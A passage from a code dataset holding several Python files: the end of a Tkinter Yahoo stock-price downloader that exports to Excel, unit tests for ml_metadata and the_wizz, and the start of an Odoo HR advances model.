\r\n\tlabel3 = Label(app, text = 'Type of List')\r\n\tlabel3.grid() \r\n\tEntry_Type_Instructions = Label(text = \"Is this a single stock or list of stocks?\")\r\n\tEntry_Type_Instructions.grid(row = 0, column = 0, columnspan = 3, sticky = W)\r\n\tStock_Entry = Radiobutton(text = \"Single Stock \", variable = Entry_Type, value = 'S', indicatoron = 0, command = onclick3).grid(row = 1, column = 0, sticky = N+S+E+W) \r\n\tStock_Entry = Radiobutton(text = \" List \", variable = Entry_Type, value = 'L', indicatoron = 0, command = onclick3).grid(row = 1, column = 1, sticky = N+S+E+W)\r\n\troot3.mainloop() \r\n\tFile_Input = Entry_Type.get()\r\n\tManual = File_Input.upper() \r\nelse:\r\n\tManual = 0 \r\n\r\n#Create new root \r\n#root2 = Tk()\r\n#root2.title('Amount of Stocks')\r\n#root2.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n#app = Frame(root2)\r\n#app.grid()\r\n#label2 = Label(app, text = 'File Name')\r\n#label2.grid() \r\n\r\n# GUI 3: Get the name of the file if they have one.\r\n\r\nif File_or_Manual == \"Y\":\r\n\t# Create Root \r\n\troot2 = Tk()\r\n\troot2.title('Amount of Stocks')\r\n\troot2.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n\tapp = Frame(root2)\r\n\tapp.grid()\r\n\tlabel2 = Label(app, text = 'File Name')\r\n\tlabel2.grid() \r\n\tFile_Answer = StringVar() \r\n\t\r\n\t# Root buttons and inputs \r\n\tFile_Input_Instructions = Label(text = \"What is the name of the File: \")\r\n\tFile_Input_Instructions.grid(row = 4, column = 0, sticky = W)\r\n\tFile_Input_Entry = Entry(textvariable = File_Answer)\r\n\tFile_Input_Entry.grid(row = 4, column = 10, columnspan = 10, sticky = W)\r\n\tFile_Input_Entry.config(borderwidth = 5 , selectborderwidth = 5)\r\n\tSubmit_Button2 = Button(text = 'Submit', command = onclick2)\r\n\tSubmit_Button2.grid(row = 6, column = 10, sticky = E) \r\n\tSubmit_Button2.config(bd = 5)\r\n\tBrowse_Button = Button(text = \"Browse for File\", command = file_onclick) \r\n\tBrowse_Button.grid(row = 6, column = 11, sticky = W) \r\n\tBrowse_Button.config(bd = 5)\r\n\troot2.mainloop() \r\n\tFile_Input = File_Answer.get()\r\n\tFile = File_Input + '.csv'\r\n\tprint(File) \r\n\tif file != None:\r\n\t\tlist = file_list \r\n\telse:\r\n\t\twith open(File) as infile:\r\n\t\t\tlist = [line.strip() for line in infile]\t\r\n\r\n# GUI 4: Enter the ticker symbol if it's a single stock. \r\nelif Manual == \"S\" :\r\n\t# Create Root\r\n\troot2 = Tk()\r\n\troot2.title('Ticker Symbol')\r\n\tw2 = 270\r\n\th2 = 60 \r\n\troot2.geometry('%dx%d+%d+%d' % (w2, h2, x, y))\r\n\tapp = Frame(root2)\r\n\tapp.grid()\r\n\tFile_Answer = StringVar() \r\n\t\r\n\t# Root buttons and input \r\n\tStock_Input_Instructions = Label(text = \"Enter the Ticker Symbol:\")\r\n\tStock_Input_Instructions.grid(row = 4, column = 1, sticky = W)\r\n\tStock_Input_Entry = Entry(textvariable = File_Answer)\r\n\tStock_Input_Entry.grid(row = 4, column = 2, sticky = E)\r\n\tSubmit_Button2 = Button(text = 'Submit', command = onclick2)\r\n\tSubmit_Button2.grid(row = 6, column = 1, columnspan = 2, sticky = N+S+E+W)\r\n\tSubmit_Button2.config(bd = 5)\r\n\troot2.mainloop() \r\n\tlist = File_Answer.get() \r\n\r\nelif Manual == \"L\" : \r\n\tList_Ticker = []\r\n\troot5 = Tk()\r\n\troot5.title('Tickers')\r\n\tw5 = 100\r\n\th5 = 250\r\n\troot5.geometry('%dx%d+%d+%d' % (w5, h5, x, y))\r\n\tapp = Frame(root5)\r\n\tapp.grid()\r\n\tMultiple_List = StringVar() \r\n\t\r\n\tStock_Ticker_Instructions = Label(text = \"List Each Ticker:\")\r\n\tStock_Ticker_Instructions.grid(row = 0, column = 0, columnspan = 2)\r\n\tMultiple_List_Variable = Text(width = 10, height = 10, wrap = WORD )\r\n\tMultiple_List_Variable.grid(row = 2, column = 1) \r\n\tSubmit_Button_List = Button(text = \"Submit\", command = onclick5)\r\n\tSubmit_Button_List.grid(row = 3, column = 1, sticky = N+S+E+W)\r\n\tSubmit_Button_List.config(bd = 5)\r\n\troot5.mainloop() \r\n\tlist = text_lines \r\n\t\r\n# The automatic file import if it is the daily report. \r\nelif Manual == \"D\" : \r\n\twith open('DailyReportIndex.csv') as infile:\r\n\t\tlist = [line.strip() for line in infile] \r\n\r\nelse:\r\n\tprint(\"An incorrect key was entered\")\r\n\r\n\r\n\r\n\"\"\" Start Timer \"\"\"\r\ntic = timeit.default_timer()\r\n\r\n\"\"\" Time and Data Intervals \"\"\"\r\n \r\n\r\n\r\n# Time and Data Interval for the Daily Report \r\nif Manual == \"D\":\r\n\tdata_interval = \"d\"\r\n\tYears_of_Data = 0 \r\n\r\n\r\nelse:\r\n\t\r\n\t# GUI 5: Ask whether you would you would like the standard 36 months or a specific date\r\n\t# Create new root\r\n\troot3 = Tk()\r\n\troot3.title('Standard Data Set')\r\n\tw3 = 400\r\n\th3 = 50 \r\n\troot3.geometry('%dx%d+%d+%d' % (w3, h3, x, y))\r\n\tapp = Frame(root3)\r\n\tapp.grid()\r\n\tStandard_Monthly = StringVar()\r\n\tTime_Interval_Answer = IntVar()\r\n\tData_Interval_Answer = StringVar()\r\n\tRadio_Answer_36 = StringVar() \r\n\tTime_Input_Instructions = Label(text = \"Would you like the standard monthly data for 36 months?\")\r\n\tTime_Input_Instructions.grid(row = 2, column = 0, sticky = W)\r\n\tSubmit_Button_3 = Radiobutton(text = ' Yes ', variable = Radio_Answer_36, value = 'Y', indicatoron = 0, command = onclick3).grid(row = 2, column = 1)\r\n\tSubmit_Button_3 = Radiobutton(text = ' No ', variable = Radio_Answer_36, value = 'N', indicatoron = 0, command = onclick3).grid(row = 2, column = 2)\r\n\t\r\n\troot3.mainloop() \r\n\ttime_interval = Radio_Answer_36.get() \r\n\tif time_interval == \"Y\":\r\n\t\tYears_of_Data = 3\r\n\t\tdata_interval = \"m\"\r\n\telse:\r\n\t\t# Ask how many years of data needed\r\n\t\t# Ask for the type of data interval they would like \r\n\t\t# Create new root\r\n\t\troot4 = Tk()\r\n\t\troot4.title('Time and Data Interval')\r\n\t\tw4 = 550\r\n\t\th4 = 70 \r\n\t\troot4.geometry('%dx%d+%d+%d' % (w4, h4, x, y))\r\n\t\tapp = Frame(root4)\r\n\t\tapp.grid()\r\n\t\t\r\n\t\t#GUI 6: The years and type of data interval needed.\r\n\t\t#File_or_Manual_Entry_Yes = Radiobutton(text = \" Yes \", variable = Answer_Control, value = 'Y', indicatoron = 0, command = onclick).grid(row = 0, column = 10, columnspan = 1, sticky = W)\r\n\t\tTime_Interval_Answer = IntVar()\r\n\t\tData_Interval_Answer = StringVar()\r\n\t\t\r\n\t\tTime_Interval_instructions = Label(text = \"How many years of prices would you like?\")\r\n\t\tTime_Interval_instructions.grid(row = 0, column = 0, sticky = W)\r\n\t\tTime_Interval_Entry = Entry(textvariable = Time_Interval_Answer)\r\n\t\tTime_Interval_Entry.grid(row = 0, column = 1, sticky = W)\r\n\t\tData_Interval_instructions = Label(text = \"Choose your Price Type:\")\r\n\t\tData_Interval_instructions.grid(row = 2, column = 0, sticky = W) \r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Daily', variable = Data_Interval_Answer, value = 'd', indicatoron = 0, command = onclick4).grid(row = 2, column =1,)\r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Weekly', variable = Data_Interval_Answer, value = 'w', indicatoron = 0, command = onclick4).grid(row = 2, column =2, sticky = W)\r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Monthly', variable = Data_Interval_Answer, value = 'm', indicatoron = 0, command = onclick4).grid(row = 2, column =3, sticky = W)\r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Dividend', variable = Data_Interval_Answer, value = 'v', indicatoron = 0, command = onclick4).grid(row = 2, column =4, sticky = W)\r\n\t\r\n\t\t\r\n\t\troot4.mainloop()\r\n\t# Ask how many years of data needed\r\n\t\tYears_of_Data_Entry = Time_Interval_Answer.get()\r\n\t\tYears_of_Data = Years_of_Data_Entry\r\n\t\tYears_of_Data = int(Years_of_Data)\r\n\t# Data interval d, w, m, v\r\n\t\tdata_interval = Data_Interval_Answer.get()\r\n\t\tdata_interval = str(data_interval) \r\n\t\t\r\n\"\"\" Start Date and End Date for Stock Info \"\"\"\r\nprint(Years_of_Data)\r\nstart_of_interval = datetime.datetime(now.year - int(Years_of_Data), now.month, now.day)\r\nend_of_interval = datetime.datetime(now.year, now.month, now.day)\t\t\r\n\r\nprint(data_interval) \r\n\"\"\"Create DataFrame and Pull Daily Report Prices\"\"\"\r\ntry: \r\n\tif data_interval != 'v':\r\n\t\tdf = pd.io.data.get_data_yahoo(list, start = start_of_interval, end = end_of_interval, interval = data_interval)['Adj Close']\r\n\telse:\r\n\t\tdf = pd.io.data.get_data_yahoo(list, start = start_of_interval, end = end_of_interval, interval = data_interval)\r\nexcept:\r\n\troot_error = Tk() \r\n\troot_error.title('Error')\r\n\tw_error = 700 \r\n\th_error = 50 \r\n\troot_error.geometry('%dx%d+%d+%d' % (w_error, h_error, x, y))\r\n\tapp = Frame(root_error)\r\n\tapp.grid()\r\n\tError_Return = Label(text = \"There was an error. No information was pulled. If using just today's prices, they may not be available yet. Try again later.\")\r\n\tError_Return.grid(row = 1, column = 1, sticky = W) \r\n\troot_error.mainloop() \r\n\tsys.exit(\"Error Message\") \r\n\r\nif Manual == \"D\":\r\n\turl = \"http://fundresearch.fidelity.com/mutual-funds/fidelity-funds-daily-pricing-yields/download\"\r\n\tCSV_Import = urllib.request.urlopen(url).read() \r\n\tCSV = pd.read_csv(url, skiprows=4) \r\n\t\r\n\tprint(CSV) \r\n\t#CSV = pd.read_csv(CSV_Import, skiprows=4) \r\n \r\n\"\"\"Create Returns\"\"\"\r\nif data_interval != 'v':\r\n\trets = df.pct_change()\r\n\r\n\"\"\" Create Correlation \"\"\"\r\nif data_interval != 'v':\r\n if File_or_Manual == \"Y\":\r\n corr = rets.corr()\r\n elif Manual == \"S\":\r\n print(\"No Correlation\")\r\n elif Manual == \"L\":\r\n corr = rets.corr()\r\n elif Manual == \"D\":\r\n corr = rets.corr() \r\n else:\r\n print(\"No Correlation\")\r\n\r\nif data_interval == \"m\":\r\n\tdf = df.resample('MS', how='mean') \r\n\t \r\n\r\nif data_interval == \"w\":\r\n\tdf = df.resample('W', how='mean')\r\n\tprint(df.head())\r\n\"\"\" Create new Excel file \"\"\"\r\n\r\nroot6 = Tk()\r\nroot6.title('Create New File')\r\nw6 = 300\r\nh6 = 80 \r\nroot6.geometry('%dx%d+%d+%d' % (w6, h6, x, y))\r\napp = Frame(root6)\r\napp.grid()\r\nlabel6 = Label(app, text = '')\r\nlabel6.grid()\r\nFile_Name = StringVar() \r\nNew_File_Input_Instructions = Label(text = \"Enter New File Name:\")\r\nNew_File_Input_Instructions.grid(row = 2, column = 0, sticky = W)\r\nNew_File_Input_Entry = Entry(textvariable = File_Name)\r\nNew_File_Input_Entry.grid(row = 2, column = 1, columnspan = 2, sticky = E)\r\nSubmit_Button2 = Button(text = 'Submit', command = onclick6)\r\nSubmit_Button2.grid(row = 3, column = 1, sticky = N+S+E+W) \r\nSubmit_Button2.config(bd = 5) \r\nBrowse_Button = Button(text = \"Browse\", command = file_onclick2) \r\nBrowse_Button.grid(row = 3, column = 2, sticky = N+S+E+W)\r\nBrowse_Button.config(bd = 5) \r\nroot6.mainloop() \r\n \r\nFile = str(File_Name.get()) \r\nif manual_file_entry == 1:\r\n\twriter = ExcelWriter(str(File) + '.xlsx') \r\nelse:\r\n\twriter = ExcelWriter(new_file) \r\n\r\n\"\"\" Write info to Excel Sheet \"\"\"\r\n\r\n# Write Prices to Excel Sheet \r\nif File_or_Manual == \"Y\":\r\n\tdf.to_excel(writer, 'Prices')\r\n\r\n# Check to see if it is dividend info, because that is written to excel like a list of stocks even if it is a single stock\r\nif data_interval != 'v':\r\n\tif Manual == \"S\":\r\n\t\tdf.to_frame(name=str(list)).to_excel(writer, 'Prices') \r\n\telif Manual == \"L\":\r\n\t\tdf.to_excel(writer, 'Prices')\r\n\telse:\r\n\t\tdf.to_excel(writer, 'Prices')\r\nelse:\r\n\tdf.to_excel(writer, 'Prices') \r\n\r\n# Write Returns to Excel Sheet \r\nif data_interval != 'v':\r\n\tif File_or_Manual == \"Y\":\r\n\t\trets.to_excel(writer,'Returns')\r\n\telif Manual == \"S\":\r\n\t\trets.to_frame(name=str(list)).to_excel(writer, 'Returns') \r\n\telif Manual == \"L\":\r\n\t\trets.to_excel(writer,'Returns')\r\n\telse:\r\n\t\trets.to_excel(writer, 'Returns') \r\n\r\n# Write Correlation to Excel Sheet \r\nif data_interval != 'v':\r\n\tif File_or_Manual == \"Y\":\r\n\t\tcorr.to_excel(writer,'corr')\r\n\telif Manual == \"S\":\r\n\t\tprint(\"no correlation\")\r\n\telif Manual == \"L\":\r\n\t\tcorr.to_excel(writer,'corr')\r\n\telse:\r\n\t\tprint(\"no correlation\")\r\nelse:\r\n\twriter.close() \r\n\r\n\r\n\r\n# Saves the Excel sheet \r\nwriter.save() \r\n\r\n\"\"\" Start the file in Excel \"\"\" \r\nif manual_file_entry == 1:\r\n\tos.startfile(File + '.xlsx')\r\nelse:\r\n\tos.startfile(File) \r\n \r\n \r\nprint(df) \r\n\r\n\r\n","sub_path":"YahooStockPrices.py","file_name":"YahooStockPrices.py","file_ext":"py","file_size_in_byte":15264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312263827","text":"# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for ml_metadata.metadata_store.metadata_store.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl.testing import absltest\nfrom ml_metadata.metadata_store import metadata_store\nfrom ml_metadata.proto import metadata_store_pb2\nfrom tensorflow.python.framework import errors\n\n\ndef _get_metadata_store():\n connection_config = metadata_store_pb2.ConnectionConfig()\n connection_config.sqlite.SetInParent()\n return metadata_store.MetadataStore(connection_config)\n\n\ndef _create_example_artifact_type():\n artifact_type = metadata_store_pb2.ArtifactType()\n artifact_type.name = \"test_type_2\"\n artifact_type.properties[\"foo\"] = metadata_store_pb2.INT\n artifact_type.properties[\"bar\"] = metadata_store_pb2.STRING\n artifact_type.properties[\"baz\"] = metadata_store_pb2.DOUBLE\n return artifact_type\n\n\ndef _create_example_execution_type():\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n return execution_type\n\n\n\n\nclass MetadataStoreTest(absltest.TestCase):\n\n def test_put_artifact_type_get_artifact_type(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n\n type_id = store.put_artifact_type(artifact_type)\n artifact_type_result = store.get_artifact_type(\"test_type_2\")\n self.assertEqual(artifact_type_result.id, type_id)\n self.assertEqual(artifact_type_result.name, \"test_type_2\")\n self.assertEqual(artifact_type_result.properties[\"foo\"],\n metadata_store_pb2.INT)\n self.assertEqual(artifact_type_result.properties[\"bar\"],\n metadata_store_pb2.STRING)\n self.assertEqual(artifact_type.properties[\"baz\"], metadata_store_pb2.DOUBLE)\n\n def test_put_artifacts_get_artifacts_by_id(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n type_id = store.put_artifact_type(artifact_type)\n artifact = metadata_store_pb2.Artifact()\n artifact.type_id = type_id\n artifact.properties[\"foo\"].int_value = 3\n artifact.properties[\"bar\"].string_value = \"Hello\"\n [artifact_id] = store.put_artifacts([artifact])\n [artifact_result] = store.get_artifacts_by_id([artifact_id])\n self.assertEqual(artifact_result.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(artifact_result.properties[\"foo\"].int_value, 3)\n\n def test_put_artifacts_get_artifacts(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n type_id = store.put_artifact_type(artifact_type)\n artifact_0 = metadata_store_pb2.Artifact()\n artifact_0.type_id = type_id\n artifact_0.properties[\"foo\"].int_value = 3\n artifact_0.properties[\"bar\"].string_value = \"Hello\"\n artifact_1 = metadata_store_pb2.Artifact()\n artifact_1.type_id = type_id\n\n [artifact_id_0,\n artifact_id_1] = store.put_artifacts([artifact_0, artifact_1])\n artifact_result = store.get_artifacts()\n if artifact_result[0].id == artifact_id_0:\n [artifact_result_0, artifact_result_1] = artifact_result\n else:\n [artifact_result_1, artifact_result_0] = artifact_result\n self.assertEqual(artifact_result_0.id, artifact_id_0)\n self.assertEqual(artifact_result_0.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(artifact_result_0.properties[\"foo\"].int_value, 3)\n self.assertEqual(artifact_result_1.id, artifact_id_1)\n\n def test_update_artifact_get_artifact(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n type_id = store.put_artifact_type(artifact_type)\n artifact = metadata_store_pb2.Artifact()\n artifact.type_id = type_id\n artifact.properties[\"bar\"].string_value = \"Hello\"\n\n [artifact_id] = store.put_artifacts([artifact])\n artifact_2 = metadata_store_pb2.Artifact()\n artifact_2.CopyFrom(artifact)\n artifact_2.id = artifact_id\n artifact_2.properties[\"foo\"].int_value = artifact_id\n artifact_2.properties[\"bar\"].string_value = \"Goodbye\"\n [artifact_id_2] = store.put_artifacts([artifact_2])\n self.assertEqual(artifact_id, artifact_id_2)\n\n [artifact_result] = store.get_artifacts_by_id([artifact_id])\n self.assertEqual(artifact_result.properties[\"bar\"].string_value, \"Goodbye\")\n self.assertEqual(artifact_result.properties[\"foo\"].int_value, artifact_id)\n\n def test_create_artifact_with_type_get_artifacts_by_id(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n artifact = metadata_store_pb2.Artifact()\n artifact.properties[\"foo\"].int_value = 3\n artifact.properties[\"bar\"].string_value = \"Hello\"\n artifact_id = store.create_artifact_with_type(artifact, artifact_type)\n [artifact_result] = store.get_artifacts_by_id([artifact_id])\n self.assertEqual(artifact_result.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(artifact_result.properties[\"foo\"].int_value, 3)\n\n def test_put_execution_type_get_execution_type(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n type_id = store.put_execution_type(execution_type)\n execution_type_result = store.get_execution_type(\"test_type_2\")\n self.assertEqual(execution_type_result.id, type_id)\n self.assertEqual(execution_type_result.name, \"test_type_2\")\n\n def test_put_executions_get_executions_by_id(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n type_id = store.put_execution_type(execution_type)\n execution = metadata_store_pb2.Execution()\n execution.type_id = type_id\n execution.properties[\"foo\"].int_value = 3\n execution.properties[\"bar\"].string_value = \"Hello\"\n [execution_id] = store.put_executions([execution])\n [execution_result] = store.get_executions_by_id([execution_id])\n self.assertEqual(execution_result.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(execution_result.properties[\"foo\"].int_value, 3)\n\n def test_put_executions_get_executions(self):\n store = _get_metadata_store()\n execution_type = _create_example_execution_type()\n type_id = store.put_execution_type(execution_type)\n execution_0 = metadata_store_pb2.Execution()\n execution_0.type_id = type_id\n execution_0.properties[\"foo\"].int_value = 3\n execution_0.properties[\"bar\"].string_value = \"Hello\"\n execution_1 = metadata_store_pb2.Execution()\n execution_1.type_id = type_id\n execution_1.properties[\"foo\"].int_value = -9\n execution_1.properties[\"bar\"].string_value = \"Goodbye\"\n\n [execution_id_0,\n execution_id_1] = store.put_executions([execution_0, execution_1])\n\n execution_result = store.get_executions()\n self.assertLen(execution_result, 2)\n # Normalize the order of the results.\n if execution_result[0].id == execution_id_0:\n [execution_result_0, execution_result_1] = execution_result\n else:\n [execution_result_1, execution_result_0] = execution_result\n\n self.assertEqual(execution_result_0.id, execution_id_0)\n self.assertEqual(execution_result_0.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(execution_result_0.properties[\"foo\"].int_value, 3)\n self.assertEqual(execution_result_1.id, execution_id_1)\n self.assertEqual(execution_result_1.properties[\"bar\"].string_value,\n \"Goodbye\")\n self.assertEqual(execution_result_1.properties[\"foo\"].int_value, -9)\n\n def test_update_execution_get_execution(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n type_id = store.put_execution_type(execution_type)\n execution = metadata_store_pb2.Execution()\n execution.type_id = type_id\n execution.properties[\"bar\"].string_value = \"Hello\"\n\n [execution_id] = store.put_executions([execution])\n execution_2 = metadata_store_pb2.Execution()\n execution_2.id = execution_id\n execution_2.type_id = type_id\n execution_2.properties[\"foo\"].int_value = 12\n execution_2.properties[\"bar\"].string_value = \"Goodbye\"\n [execution_id_2] = store.put_executions([execution_2])\n self.assertEqual(execution_id, execution_id_2)\n\n [execution_result] = store.get_executions_by_id([execution_id])\n self.assertEqual(execution_result.properties[\"bar\"].string_value, \"Goodbye\")\n self.assertEqual(execution_result.properties[\"foo\"].int_value, 12)\n\n def test_put_events_get_events(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"execution_type\"\n execution_type_id = store.put_execution_type(execution_type)\n execution = metadata_store_pb2.Execution()\n execution.type_id = execution_type_id\n [execution_id] = store.put_executions([execution])\n artifact_type = metadata_store_pb2.ArtifactType()\n artifact_type.name = \"artifact_type\"\n artifact_type_id = store.put_artifact_type(artifact_type)\n artifact = metadata_store_pb2.Artifact()\n artifact.type_id = artifact_type_id\n [artifact_id] = store.put_artifacts([artifact])\n\n event = metadata_store_pb2.Event()\n event.type = metadata_store_pb2.Event.DECLARED_OUTPUT\n event.artifact_id = artifact_id\n event.execution_id = execution_id\n store.put_events([event])\n [event_result] = store.get_events_by_artifact_ids([artifact_id])\n self.assertEqual(event_result.artifact_id, artifact_id)\n self.assertEqual(event_result.execution_id, execution_id)\n self.assertEqual(event_result.type,\n metadata_store_pb2.Event.DECLARED_OUTPUT)\n\n [event_result_2] = store.get_events_by_execution_ids([execution_id])\n self.assertEqual(event_result_2.artifact_id, artifact_id)\n self.assertEqual(event_result_2.execution_id, execution_id)\n self.assertEqual(event_result_2.type,\n metadata_store_pb2.Event.DECLARED_OUTPUT)\n\n def test_get_executions_by_id_empty(self):\n \"\"\"See b/122594744.\"\"\"\n store = _get_metadata_store()\n result = store.get_executions_by_id({})\n self.assertEmpty(result)\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","sub_path":"ml_metadata/metadata_store/metadata_store_test.py","file_name":"metadata_store_test.py","file_ext":"py","file_size_in_byte":11250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"638291830","text":"\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy as np\nimport h5py\nimport subprocess\nimport unittest\n\nimport stomp\n\nfrom the_wizz import pair_maker_utils\nfrom the_wizz import stomp_utils\n\n\nclass DummyArgs(object):\n\n def __init__(self):\n self.reference_ra_name = 'ra'\n self.reference_dec_name = 'dec'\n self.reference_redshift_name = 'z'\n self.reference_index_name = None\n\n self.unknown_ra_name = 'ra'\n self.unknown_dec_name = 'dec'\n self.unknown_index_name = 'id'\n\n self.z_min = 0.01\n self.z_max = 10.0\n\n self.n_randoms = 10\n self.output_hdf5_file = 'unittest_output.hdf5'\n\n\nclass TestPairMakerUtils(unittest.TestCase):\n\n def setUp(self):\n self.dummy_args = DummyArgs()\n self.stomp_map = stomp.Map(\n 'data/COSMOS_X_zCOSMOS_BRIGHT_excluded.map')\n self.stomp_map.InitializeRegions(8)\n (self.reference_vect, self.reference_id_array,\n self.reference_tree) = stomp_utils.load_reference_sample(\n 'data/zCOSMOS_BRIGHT_v3.5_spec_FLAG34_FLAG134.fits',\n self.stomp_map, self.dummy_args)\n self.unknown_tree = stomp_utils.load_unknown_sample(\n 'data/COSMOS_iband_2009_radecidstomp_regionzp_best.fits',\n self.stomp_map, self.dummy_args)\n\n def tearDown(self):\n subprocess.Popen('rm unittest_output.hdf5', shell=True)\n\n def test_raw_pair_finder_and_hdf5_creation(self):\n pair_finder = pair_maker_utils.RawPairFinder(\n self.unknown_tree, self.reference_vect,\n self.reference_id_array, self.reference_tree,\n self.stomp_map, self.dummy_args.output_hdf5_file, None,\n create_hdf5_file=True, input_args=self.dummy_args)\n\n def test_pair_maker_output(self):\n\n pair_finder = pair_maker_utils.RawPairFinder(\n self.unknown_tree, self.reference_vect, self.reference_id_array,\n self.reference_tree, self.stomp_map,\n self.dummy_args.output_hdf5_file, None, create_hdf5_file=True,\n input_args=self.dummy_args)\n pair_finder.find_pairs(100, 300)\n\n output_hdf5_file = h5py.File(self.dummy_args.output_hdf5_file, 'r')\n test_hdf5_file = h5py.File('data/unittest_output.hdf5')\n\n for reference_idx, reference_obj in enumerate(self.reference_vect):\n ref_grp = output_hdf5_file[\n 'data/%i' %\n self.reference_id_array[reference_idx]]\n scale_grp = output_hdf5_file[\n 'data/%i/kpc100t300' %\n self.reference_id_array[reference_idx]]\n ref_pair_id_array = scale_grp['ids'][...]\n ref_dist_weight_array = scale_grp['dist_weights'][...]\n\n test_grp = test_hdf5_file[\n 'data/%s' %\n self.reference_id_array[reference_idx]]\n test_pair_id_array = test_grp['kpc100t300/ids'][...]\n test_dist_weight_array = test_grp['kpc100t300/dist_weights'][...]\n if ref_pair_id_array.shape[0] != test_pair_id_array.shape[0]:\n print('Failed for reference id:',\n self.reference_id_array[reference_idx])\n self.assertEqual(ref_pair_id_array.shape, test_pair_id_array.shape)\n for ref_pair_id, test_pair_id, \\\n ref_dist_weight, test_dist_weight in \\\n zip(ref_pair_id_array, test_pair_id_array,\n ref_dist_weight_array, test_dist_weight_array):\n self.assertEqual(ref_pair_id, test_pair_id)\n self.assertAlmostEqual(ref_dist_weight, test_dist_weight)\n\n self.assertAlmostEqual(\n ref_grp.attrs['redshift'],\n test_grp.attrs['redshift'])\n self.assertAlmostEqual(\n scale_grp.attrs['unmasked_frac'],\n test_grp['kpc100t300'].attrs['unmasked_frac'])\n self.assertEqual(\n scale_grp.attrs['bin_resolution'],\n test_grp['kpc100t300'].attrs['bin_resolution'])\n self.assertAlmostEqual(\n scale_grp.attrs['area'],\n test_grp['kpc100t300'].attrs['area'])\n\n def test_pair_maker_with_randoms(self):\n\n random_tree = stomp_utils.create_random_data(\n self.dummy_args.n_randoms * self.unknown_tree.NPoints(),\n self.stomp_map)\n\n pair_finder = pair_maker_utils.RawPairFinder(\n self.unknown_tree, self.reference_vect, self.reference_id_array,\n self.reference_tree, self.stomp_map,\n self.dummy_args.output_hdf5_file, random_tree,\n create_hdf5_file=True, input_args=self.dummy_args)\n pair_finder.find_pairs(100, 300)\n\n output_hdf5_file = h5py.File(self.dummy_args.output_hdf5_file, 'r')\n data_grp = output_hdf5_file['data']\n n_random = data_grp.attrs['n_random_points']\n tot_area = data_grp.attrs['area']\n\n ref_random_sum = 0\n ref_area_sum = 0.\n for reference_idx, reference_obj in enumerate(self.reference_vect):\n scale_grp = output_hdf5_file[\n 'data/%i/kpc100t300' %\n self.reference_id_array[reference_idx]]\n ref_random_sum += scale_grp.attrs['n_random']\n ref_area_sum += scale_grp.attrs['area']\n self.assertAlmostEqual(\n (n_random / tot_area) /\n (ref_random_sum / ref_area_sum) - 1,\n 0.0, places=2)\n\n\nif __name__ == \"__main__\":\n\n unittest.main()\n","sub_path":"tests/test_pair_maker_utils.py","file_name":"test_pair_maker_utils.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369927212","text":"# -*- coding: utf-8 -*-\n\nimport odoo.addons.decimal_precision as dp\nfrom odoo import models, fields, api, _\nfrom odoo.addons.kzm_base.controllers.tools import remove_accent\n\n\nclass hr_avance(models.Model):\n _name = 'hr.avance'\n _description = 'Avances'\n\n @api.onchange('name')\n def _onchange_name(self) :\n if self.name and not self.code:\n self.code = remove_accent(self.name.strip().replace(' ','_')).upper()\n\n @api.one\n @api.depends('rate_type')\n def _compute_rates(self):\n if self.rate_type == 'imp':\n self.rate_patronale = 100\n self.rate_salariale = 0\n else:\n self.rate_patronale = 0\n self.rate_salariale = 100\n\n rate_type = fields.Selection([\n ('exo', 'Exonoré'),\n ('imp', 'Imposable'),\n ], string=u'Exonération', required=True, default='exo')\n\n sequence = fields.Integer(string=u'Séquence', default=0)\n code = fields.Char(string=u'Code', size=64, required=True)\n name = fields.Char(string=u'Nom', size=64, required=True)\n rate_salariale = fields.Float(\n string=u'Taux',\n digits=dp.get_precision('Account'),\n compute='_compute_rates',\n store=True,\n )\n rate_patronale = 